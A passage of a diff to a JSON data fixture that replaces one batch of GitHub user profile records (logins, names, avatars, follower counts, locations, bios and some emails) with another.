"jake-cryptic", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/119890983?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/141138785?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2022-12-05T19:12:06Z", - "updated_at": "2024-08-23T15:14:47Z", - "node_id": "U_kgDOByVkJw", + "public_repositories_count": 1, + "created_at": "2023-08-01T10:57:32Z", + "updated_at": "2023-08-01T10:59:29Z", + "node_id": "U_kgDOCGmbYQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418253,24 +677377,24 @@ }, { "model": "github.user", - "pk": 2321, + "pk": 7659, "fields": { - "nest_created_at": "2024-09-12T01:15:03.898Z", - "nest_updated_at": "2024-09-12T01:16:04.045Z", - "name": "", - "login": "Halogenmake", + "nest_created_at": "2024-09-22T09:35:29.771Z", + "nest_updated_at": "2024-09-22T19:36:41.493Z", + "name": "Kirill Pavlov", + "login": "pavkir", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/118000064?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6832571?v=4", "company": "", - "location": "", + "location": "Russia, Saint-Petersburg", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-11-11T14:36:22Z", - "updated_at": "2024-09-10T14:39:37Z", - "node_id": "U_kgDOBwiJwA", + "public_repositories_count": 8, + "created_at": "2014-03-02T17:57:01Z", + "updated_at": "2024-04-13T21:27:30Z", + "node_id": "MDQ6VXNlcjY4MzI1NzE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418278,49 +677402,49 @@ }, { "model": "github.user", - "pk": 2322, + "pk": 7660, "fields": { - "nest_created_at": "2024-09-12T01:15:05.462Z", - "nest_updated_at": "2024-09-12T01:15:05.462Z", - "name": "Kaan Atmaca", - "login": "kaanatmacaa", + "nest_created_at": "2024-09-22T09:35:30.096Z", + "nest_updated_at": "2024-09-22T19:35:31.171Z", + "name": "Luiz Paulo S. Monteiro", + "login": "adiffpirate", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/57772940?v=4", - "company": "", - "location": "Istanbul", + "avatar_url": "https://avatars.githubusercontent.com/u/35786917?v=4", + "company": "Opus Software", + "location": "São José dos Campos/SP - Brazil", "collaborators_count": 0, - "following_count": 23, - "followers_count": 47, + "following_count": 1, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2019-11-14T20:12:27Z", - "updated_at": "2024-08-02T06:43:43Z", - "node_id": "MDQ6VXNlcjU3NzcyOTQw", - "bio": "Penetration Tester", + "public_repositories_count": 18, + "created_at": "2018-01-25T01:02:37Z", + "updated_at": "2024-02-16T15:20:28Z", + "node_id": "MDQ6VXNlcjM1Nzg2OTE3", + "bio": "I love to automate stuff <3", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2323, + "pk": 7661, "fields": { - "nest_created_at": "2024-09-12T01:15:08.004Z", - "nest_updated_at": "2024-09-12T01:15:08.004Z", - "name": "", - "login": "barucijah", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22957660?v=4", + "nest_created_at": "2024-09-22T09:35:30.440Z", + "nest_updated_at": "2024-09-22T19:34:32.781Z", + "name": "Marek.P", + "login": "marekpawlowski", + "email": "marek.pawlowski@brainly.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2529453?v=4", "company": "", - "location": "", + "location": "Poznań Poland", "collaborators_count": 0, "following_count": 3, - "followers_count": 2, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2016-10-20T11:22:03Z", - "updated_at": "2024-07-12T12:42:08Z", - "node_id": "MDQ6VXNlcjIyOTU3NjYw", + "public_repositories_count": 15, + "created_at": "2012-10-10T15:38:44Z", + "updated_at": "2024-06-18T10:57:46Z", + "node_id": "MDQ6VXNlcjI1Mjk0NTM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418328,49 +677452,49 @@ }, { "model": "github.user", - "pk": 2324, + "pk": 7662, "fields": { - "nest_created_at": "2024-09-12T01:15:09.288Z", - "nest_updated_at": "2024-09-12T01:15:09.288Z", - "name": "", - "login": "Wakramshaik", + "nest_created_at": "2024-09-22T09:35:31.059Z", + "nest_updated_at": "2024-09-22T19:36:06.779Z", + "name": "Nicolas Landais", + "login": "nlandais", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/169911735?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4511029?v=4", "company": "", - "location": "", + "location": "USA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-05-15T13:23:55Z", - "updated_at": "2024-05-15T13:24:26Z", - "node_id": "U_kgDOCiCltw", + "following_count": 8, + "followers_count": 5, + "public_gists_count": 2, + "public_repositories_count": 21, + "created_at": "2013-05-23T15:58:01Z", + "updated_at": "2023-08-14T21:29:42Z", + "node_id": "MDQ6VXNlcjQ1MTEwMjk=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2325, + "pk": 7663, "fields": { - "nest_created_at": "2024-09-12T01:15:10.631Z", - "nest_updated_at": "2024-09-12T01:15:10.631Z", - "name": "", - "login": "macsoun", + "nest_created_at": "2024-09-22T09:35:31.402Z", + "nest_updated_at": "2024-09-22T19:34:33.754Z", + "name": "SecurityEdge", + "login": "SecurityEdge2", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/52595681?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/62696010?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-07-06T08:24:06Z", - "updated_at": "2024-05-15T12:01:35Z", - "node_id": "MDQ6VXNlcjUyNTk1Njgx", + "public_repositories_count": 5, + "created_at": "2020-03-26T09:52:54Z", + "updated_at": "2024-05-06T10:19:26Z", + "node_id": "MDQ6VXNlcjYyNjk2MDEw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418378,24 +677502,24 @@ }, { "model": "github.user", - "pk": 2326, + "pk": 7664, "fields": { - "nest_created_at": "2024-09-12T01:15:16.951Z", - "nest_updated_at": "2024-09-12T01:15:16.951Z", - "name": "", - "login": "MarianG", + "nest_created_at": "2024-09-22T09:35:31.755Z", + "nest_updated_at": "2024-09-22T19:34:34.072Z", + "name": "menacekop", + "login": "jacobbrozenick", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1209742?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/55261908?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2011-11-21T08:24:21Z", - "updated_at": "2024-07-01T11:41:15Z", - "node_id": "MDQ6VXNlcjEyMDk3NDI=", + "public_repositories_count": 1, + "created_at": "2019-09-12T23:04:07Z", + "updated_at": "2022-12-07T21:07:48Z", + "node_id": "MDQ6VXNlcjU1MjYxOTA4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418403,74 +677527,74 @@ }, { "model": "github.user", - "pk": 2327, + "pk": 7665, "fields": { - "nest_created_at": "2024-09-12T01:15:18.222Z", - "nest_updated_at": "2024-09-12T01:15:18.222Z", - "name": "K0mand1r", - "login": "k0mand1r", + "nest_created_at": "2024-09-22T09:35:32.104Z", + "nest_updated_at": "2024-09-22T19:35:47.368Z", + "name": "", + "login": "sarahgibs", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13031028?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/93540258?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 23, + "following_count": 0, "followers_count": 3, "public_gists_count": 1, - "public_repositories_count": 23, - "created_at": "2015-06-24T09:26:03Z", - "updated_at": "2024-05-22T07:57:03Z", - "node_id": "MDQ6VXNlcjEzMDMxMDI4", - "bio": "Python programmer, Infosec guy", + "public_repositories_count": 4, + "created_at": "2021-11-01T16:15:42Z", + "updated_at": "2024-09-13T14:47:06Z", + "node_id": "U_kgDOBZNPog", + "bio": "Work account for doing work. ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2328, + "pk": 7666, "fields": { - "nest_created_at": "2024-09-12T01:15:20.800Z", - "nest_updated_at": "2024-09-12T01:15:20.800Z", - "name": "Maximilian Waidelich", - "login": "maxwai", + "nest_created_at": "2024-09-22T09:35:32.431Z", + "nest_updated_at": "2024-09-22T19:34:34.690Z", + "name": "Siddharth Kotian", + "login": "siddse7en", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44324946?v=4", - "company": "LRE Medical", - "location": "Munich, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/22821465?v=4", + "company": "", + "location": "Boston", "collaborators_count": 0, - "following_count": 6, - "followers_count": 6, + "following_count": 7, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2018-10-20T18:06:13Z", - "updated_at": "2024-08-26T08:06:34Z", - "node_id": "MDQ6VXNlcjQ0MzI0OTQ2", - "bio": "", + "public_repositories_count": 10, + "created_at": "2016-10-13T17:04:52Z", + "updated_at": "2024-08-28T00:28:24Z", + "node_id": "MDQ6VXNlcjIyODIxNDY1", + "bio": "Developer + Security", "is_hireable": false, - "twitter_username": "MaximilianWaide" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2329, + "pk": 7667, "fields": { - "nest_created_at": "2024-09-12T01:15:22.022Z", - "nest_updated_at": "2024-09-12T01:15:22.022Z", - "name": "Brieuc Renaudin", - "login": "brieucR", + "nest_created_at": "2024-09-22T09:35:36.769Z", + "nest_updated_at": "2024-09-22T19:34:38.911Z", + "name": "Jan-Jelle Kester", + "login": "jjkester", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/108789960?v=4", - "company": "@BackMarket ", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/177344?v=4", + "company": "", + "location": "The Netherlands", "collaborators_count": 0, - "following_count": 21, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-07-06T07:25:43Z", - "updated_at": "2024-08-14T14:02:14Z", - "node_id": "U_kgDOBnwAyA", + "following_count": 3, + "followers_count": 25, + "public_gists_count": 2, + "public_repositories_count": 20, + "created_at": "2010-01-06T12:44:03Z", + "updated_at": "2024-08-02T11:16:58Z", + "node_id": "MDQ6VXNlcjE3NzM0NA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418478,74 +677602,74 @@ }, { "model": "github.user", - "pk": 2330, + "pk": 7668, "fields": { - "nest_created_at": "2024-09-12T01:15:23.278Z", - "nest_updated_at": "2024-09-12T01:15:25.799Z", - "name": "Rahul Mahulkar", - "login": "iamrahul127", - "email": "iamrahul127@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/24877322?v=4", - "company": "Tieto India", - "location": "Pune, India", + "nest_created_at": "2024-09-22T09:35:37.088Z", + "nest_updated_at": "2024-09-22T19:34:39.232Z", + "name": "Ryan Castner", + "login": "audiolion", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2430381?v=4", + "company": "@SironaMedical ", + "location": "Upstate NY", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-01-02T14:45:01Z", - "updated_at": "2024-06-11T05:42:18Z", - "node_id": "MDQ6VXNlcjI0ODc3MzIy", - "bio": "", + "following_count": 272, + "followers_count": 125, + "public_gists_count": 12, + "public_repositories_count": 154, + "created_at": "2012-09-26T17:03:11Z", + "updated_at": "2024-09-07T15:38:37Z", + "node_id": "MDQ6VXNlcjI0MzAzODE=", + "bio": "Engineering Manager. TypeScript, React, GraphQL, Go, Python. Philomath. Dad to two dogs: Piper 🦮 and Peach 🍑.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "ryan_castner" } }, { "model": "github.user", - "pk": 2331, + "pk": 7669, "fields": { - "nest_created_at": "2024-09-12T01:15:24.517Z", - "nest_updated_at": "2024-09-18T19:05:24.392Z", - "name": "", - "login": "GraoMelo", + "nest_created_at": "2024-09-22T09:35:37.395Z", + "nest_updated_at": "2024-09-22T19:34:39.554Z", + "name": "Scott Adams", + "login": "ScottEAdams", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60477737?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/624154?v=4", "company": "", - "location": "", + "location": "Stockholm", "collaborators_count": 0, - "following_count": 2, - "followers_count": 12, - "public_gists_count": 0, - "public_repositories_count": 83, - "created_at": "2020-01-30T15:33:29Z", - "updated_at": "2024-08-23T13:07:22Z", - "node_id": "MDQ6VXNlcjYwNDc3NzM3", - "bio": "Blockchain evangelist.", + "following_count": 0, + "followers_count": 7, + "public_gists_count": 4, + "public_repositories_count": 107, + "created_at": "2011-02-17T21:56:18Z", + "updated_at": "2024-09-16T17:40:16Z", + "node_id": "MDQ6VXNlcjYyNDE1NA==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2332, + "pk": 7670, "fields": { - "nest_created_at": "2024-09-12T01:15:27.056Z", - "nest_updated_at": "2024-09-16T22:27:02.704Z", - "name": "", - "login": "navzen2000", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17735867?v=4", + "nest_created_at": "2024-09-22T09:35:37.721Z", + "nest_updated_at": "2024-09-22T19:34:39.861Z", + "name": "Kevin Alberts", + "login": "Kurocon", + "email": "kevin@kevinalberts.nl", + "avatar_url": "https://avatars.githubusercontent.com/u/1193988?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-03-09T03:25:55Z", - "updated_at": "2024-09-12T07:02:26Z", - "node_id": "MDQ6VXNlcjE3NzM1ODY3", + "following_count": 12, + "followers_count": 18, + "public_gists_count": 1, + "public_repositories_count": 43, + "created_at": "2011-11-14T16:05:18Z", + "updated_at": "2024-09-16T15:40:43Z", + "node_id": "MDQ6VXNlcjExOTM5ODg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418553,74 +677677,74 @@ }, { "model": "github.user", - "pk": 2333, + "pk": 7671, "fields": { - "nest_created_at": "2024-09-12T01:15:27.894Z", - "nest_updated_at": "2024-09-12T01:15:37.322Z", - "name": "Krish", - "login": "Nsai1997", + "nest_created_at": "2024-09-22T09:35:38.036Z", + "nest_updated_at": "2024-09-22T19:34:40.205Z", + "name": "Vitor Figueiro", + "login": "vfigueiro", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46392529?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/88949?v=4", + "company": "Patch Plants", + "location": "Plymouth, UK", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 17, + "followers_count": 27, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2019-01-05T06:06:34Z", - "updated_at": "2024-06-10T09:54:47Z", - "node_id": "MDQ6VXNlcjQ2MzkyNTI5", - "bio": "", + "public_repositories_count": 16, + "created_at": "2009-05-27T00:57:11Z", + "updated_at": "2024-08-24T11:21:28Z", + "node_id": "MDQ6VXNlcjg4OTQ5", + "bio": "Full-stack developer with a background in business software and a focus on Python / Django.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2334, + "pk": 7672, "fields": { - "nest_created_at": "2024-09-12T01:15:34.255Z", - "nest_updated_at": "2024-09-12T01:15:34.255Z", - "name": "Timofey Tsvetkov", - "login": "akiracrying", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/78951084?v=4", + "nest_created_at": "2024-09-22T09:35:38.354Z", + "nest_updated_at": "2024-09-22T19:34:40.522Z", + "name": "Francisco Pérez Ferrer ", + "login": "francofuji", + "email": "francofuji@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/805167?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 3, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2021-02-12T07:22:00Z", - "updated_at": "2024-07-29T17:17:49Z", - "node_id": "MDQ6VXNlcjc4OTUxMDg0", - "bio": "// they spy on us \r\n// cybersecurity", - "is_hireable": false, + "public_repositories_count": 35, + "created_at": "2011-05-23T13:20:09Z", + "updated_at": "2024-03-19T16:40:30Z", + "node_id": "MDQ6VXNlcjgwNTE2Nw==", + "bio": "", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2335, + "pk": 7673, "fields": { - "nest_created_at": "2024-09-12T01:15:35.511Z", - "nest_updated_at": "2024-09-12T01:15:35.511Z", - "name": "Dkryptur", - "login": "J1nchur1k1", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/53573052?v=4", + "nest_created_at": "2024-09-22T09:35:38.667Z", + "nest_updated_at": "2024-09-22T19:34:40.836Z", + "name": "John R. Tipton", + "login": "johnrtipton", + "email": "github@trylinux.org", + "avatar_url": "https://avatars.githubusercontent.com/u/2789464?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-08-01T14:51:09Z", - "updated_at": "2024-06-27T05:57:15Z", - "node_id": "MDQ6VXNlcjUzNTczMDUy", + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 19, + "created_at": "2012-11-13T18:49:21Z", + "updated_at": "2024-06-06T17:46:18Z", + "node_id": "MDQ6VXNlcjI3ODk0NjQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418628,49 +677752,49 @@ }, { "model": "github.user", - "pk": 2336, + "pk": 7674, "fields": { - "nest_created_at": "2024-09-12T01:15:36.313Z", - "nest_updated_at": "2024-09-12T01:15:36.313Z", - "name": "", - "login": "esrabayramova", + "nest_created_at": "2024-09-22T09:35:38.976Z", + "nest_updated_at": "2024-09-22T19:34:41.152Z", + "name": "Stavros Korokithakis", + "login": "skorokithakis", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/59417568?v=4", - "company": "Baku Higher Oil School", - "location": "Sumgayit, Azerbaijan", + "avatar_url": "https://avatars.githubusercontent.com/u/23648?v=4", + "company": "Stochastic Technologies Ltd.", + "location": "Thessaloniki, Greece", "collaborators_count": 0, - "following_count": 9, - "followers_count": 11, - "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2020-01-01T17:06:35Z", - "updated_at": "2024-08-10T07:15:47Z", - "node_id": "MDQ6VXNlcjU5NDE3NTY4", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "following_count": 2, + "followers_count": 825, + "public_gists_count": 9, + "public_repositories_count": 201, + "created_at": "2008-09-08T13:22:25Z", + "updated_at": "2024-09-14T11:05:08Z", + "node_id": "MDQ6VXNlcjIzNjQ4", + "bio": "I love writing code, making stupid devices and writing about writing code and making stupid devices.", + "is_hireable": true, + "twitter_username": "stavros" } }, { "model": "github.user", - "pk": 2337, + "pk": 7675, "fields": { - "nest_created_at": "2024-09-12T01:15:41.564Z", - "nest_updated_at": "2024-09-12T01:15:41.564Z", - "name": "", - "login": "MotiejusK", + "nest_created_at": "2024-09-22T09:35:39.292Z", + "nest_updated_at": "2024-09-22T19:34:41.465Z", + "name": "Keith Bussell", + "login": "kbussell", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11046392?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/18281?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2015-02-17T15:24:44Z", - "updated_at": "2024-02-25T11:59:23Z", - "node_id": "MDQ6VXNlcjExMDQ2Mzky", + "following_count": 2, + "followers_count": 16, + "public_gists_count": 6, + "public_repositories_count": 35, + "created_at": "2008-07-24T16:29:08Z", + "updated_at": "2024-09-12T15:33:42Z", + "node_id": "MDQ6VXNlcjE4Mjgx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418678,99 +677802,99 @@ }, { "model": "github.user", - "pk": 2338, + "pk": 7676, "fields": { - "nest_created_at": "2024-09-12T01:15:46.751Z", - "nest_updated_at": "2024-09-12T01:15:46.751Z", - "name": "", - "login": "R00G3R", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/72633075?v=4", + "nest_created_at": "2024-09-22T09:35:39.599Z", + "nest_updated_at": "2024-09-22T19:34:41.776Z", + "name": "Onur YALAZI", + "login": "fsniper", + "email": "onur@yalazi.org", + "avatar_url": "https://avatars.githubusercontent.com/u/803734?v=4", "company": "", - "location": "", + "location": "Dublin", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2020-10-09T22:47:37Z", - "updated_at": "2024-06-13T13:08:39Z", - "node_id": "MDQ6VXNlcjcyNjMzMDc1", + "following_count": 3, + "followers_count": 16, + "public_gists_count": 2, + "public_repositories_count": 43, + "created_at": "2011-05-22T17:38:15Z", + "updated_at": "2024-09-09T21:26:56Z", + "node_id": "MDQ6VXNlcjgwMzczNA==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2339, + "pk": 7677, "fields": { - "nest_created_at": "2024-09-12T01:15:47.598Z", - "nest_updated_at": "2024-09-12T01:15:47.598Z", - "name": "John Cleve", - "login": "jcleve", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3017379?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:35:39.905Z", + "nest_updated_at": "2024-09-22T19:34:42.090Z", + "name": "Nitesh Rijal", + "login": "openrijal", + "email": "rijal.it@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/191368?v=4", + "company": "@noskofficial", + "location": "Texas", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 33, - "created_at": "2012-12-11T15:13:38Z", - "updated_at": "2024-09-05T14:27:42Z", - "node_id": "MDQ6VXNlcjMwMTczNzk=", - "bio": "", - "is_hireable": false, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 23, + "public_repositories_count": 37, + "created_at": "2010-01-28T05:40:09Z", + "updated_at": "2024-08-08T00:03:59Z", + "node_id": "MDQ6VXNlcjE5MTM2OA==", + "bio": "I would change the world but they would not give me the source code.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2340, + "pk": 7678, "fields": { - "nest_created_at": "2024-09-12T01:15:48.849Z", - "nest_updated_at": "2024-09-12T01:15:48.849Z", - "name": "", - "login": "mnunzio", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/81348966?v=4", + "nest_created_at": "2024-09-22T09:35:40.228Z", + "nest_updated_at": "2024-09-22T19:34:42.398Z", + "name": "Fernando Espíndola", + "login": "fernandoe", + "email": "fer.esp@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/228895?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 27, + "followers_count": 36, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2021-03-25T06:41:18Z", - "updated_at": "2024-07-21T05:00:29Z", - "node_id": "MDQ6VXNlcjgxMzQ4OTY2", - "bio": "", + "public_repositories_count": 75, + "created_at": "2010-03-23T18:25:10Z", + "updated_at": "2024-08-21T11:35:11Z", + "node_id": "MDQ6VXNlcjIyODg5NQ==", + "bio": "Gaúcho de Porto Alegre, pythonista por opção e empreendedor por paixão...\r\nAtualmente investindo tempo em um canal onde ensino Django/Python", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2341, + "pk": 7679, "fields": { - "nest_created_at": "2024-09-12T01:15:51.322Z", - "nest_updated_at": "2024-09-12T01:15:51.322Z", - "name": "Asutosh kumar rana", - "login": "ashu-tosh99", + "nest_created_at": "2024-09-22T09:35:40.586Z", + "nest_updated_at": "2024-09-22T19:34:42.717Z", + "name": "sven", + "login": "svenauhagen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/71056834?v=4", - "company": "GLOBBUSOFT", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2235797?v=4", + "company": "Voleatech GmbH", + "location": "Germany", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2020-09-10T03:59:58Z", - "updated_at": "2024-08-01T03:35:37Z", - "node_id": "MDQ6VXNlcjcxMDU2ODM0", + "public_repositories_count": 31, + "created_at": "2012-08-28T16:55:58Z", + "updated_at": "2024-06-04T06:56:10Z", + "node_id": "MDQ6VXNlcjIyMzU3OTc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418778,24 +677902,24 @@ }, { "model": "github.user", - "pk": 2342, + "pk": 7680, "fields": { - "nest_created_at": "2024-09-12T01:15:52.577Z", - "nest_updated_at": "2024-09-12T01:15:52.577Z", + "nest_created_at": "2024-09-22T09:35:40.910Z", + "nest_updated_at": "2024-09-22T19:34:43.085Z", "name": "", - "login": "dchan14", + "login": "Isszul", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5563676?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2150998?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 0, + "following_count": 0, + "followers_count": 1, "public_gists_count": 1, - "public_repositories_count": 1, - "created_at": "2013-09-28T10:53:07Z", - "updated_at": "2024-06-17T10:37:12Z", - "node_id": "MDQ6VXNlcjU1NjM2NzY=", + "public_repositories_count": 31, + "created_at": "2012-08-14T13:24:46Z", + "updated_at": "2024-02-08T12:01:30Z", + "node_id": "MDQ6VXNlcjIxNTA5OTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418803,24 +677927,24 @@ }, { "model": "github.user", - "pk": 2343, + "pk": 7681, "fields": { - "nest_created_at": "2024-09-12T01:15:57.991Z", - "nest_updated_at": "2024-09-12T01:15:57.991Z", - "name": "", - "login": "c3r63ru5", + "nest_created_at": "2024-09-22T09:35:41.225Z", + "nest_updated_at": "2024-09-22T19:34:43.401Z", + "name": "Stephen Mc Guinness", + "login": "smokeyfish", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13238344?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/695339?v=4", "company": "", - "location": "", + "location": "Dublin, Ireland", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 2, - "created_at": "2015-07-08T13:46:32Z", - "updated_at": "2024-07-26T09:40:03Z", - "node_id": "MDQ6VXNlcjEzMjM4MzQ0", + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2011-03-28T15:37:30Z", + "updated_at": "2023-10-18T13:49:27Z", + "node_id": "MDQ6VXNlcjY5NTMzOQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418828,24 +677952,24 @@ }, { "model": "github.user", - "pk": 2344, + "pk": 7682, "fields": { - "nest_created_at": "2024-09-12T01:15:59.302Z", - "nest_updated_at": "2024-09-12T01:15:59.302Z", - "name": "", - "login": "ptitkosmos", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20866643?v=4", + "nest_created_at": "2024-09-22T09:35:41.544Z", + "nest_updated_at": "2024-09-22T19:34:43.737Z", + "name": "Stephen Goodman", + "login": "goodmase", + "email": "stephen.goodman@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1740562?v=4", "company": "", - "location": "", + "location": "Atlanta, GA", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2016-08-05T21:41:52Z", - "updated_at": "2024-08-08T09:49:03Z", - "node_id": "MDQ6VXNlcjIwODY2NjQz", + "following_count": 0, + "followers_count": 2, + "public_gists_count": 2, + "public_repositories_count": 14, + "created_at": "2012-05-15T02:28:15Z", + "updated_at": "2021-08-04T19:08:19Z", + "node_id": "MDQ6VXNlcjE3NDA1NjI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418853,49 +677977,49 @@ }, { "model": "github.user", - "pk": 2345, + "pk": 7683, "fields": { - "nest_created_at": "2024-09-12T01:16:00.551Z", - "nest_updated_at": "2024-09-12T01:16:00.551Z", - "name": "Inferno_geek", - "login": "Infernogeek1", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/36582674?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:35:41.858Z", + "nest_updated_at": "2024-09-22T19:34:44.051Z", + "name": "Rod Manning", + "login": "rodmanning", + "email": "rod.manning@taslytic.com", + "avatar_url": "https://avatars.githubusercontent.com/u/21979239?v=4", + "company": "Taslytic Solutions", + "location": "Brisbane, Australia", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 3, - "created_at": "2018-02-18T04:43:01Z", - "updated_at": "2024-08-12T16:28:21Z", - "node_id": "MDQ6VXNlcjM2NTgyNjc0", - "bio": "", - "is_hireable": false, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 5, + "public_repositories_count": 7, + "created_at": "2016-09-04T01:57:03Z", + "updated_at": "2021-01-16T06:27:54Z", + "node_id": "MDQ6VXNlcjIxOTc5MjM5", + "bio": "Aviation flight and ground training specialist, with a passion for using modern IT systems and practices to solve problems faced by the aviation community.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2346, + "pk": 7684, "fields": { - 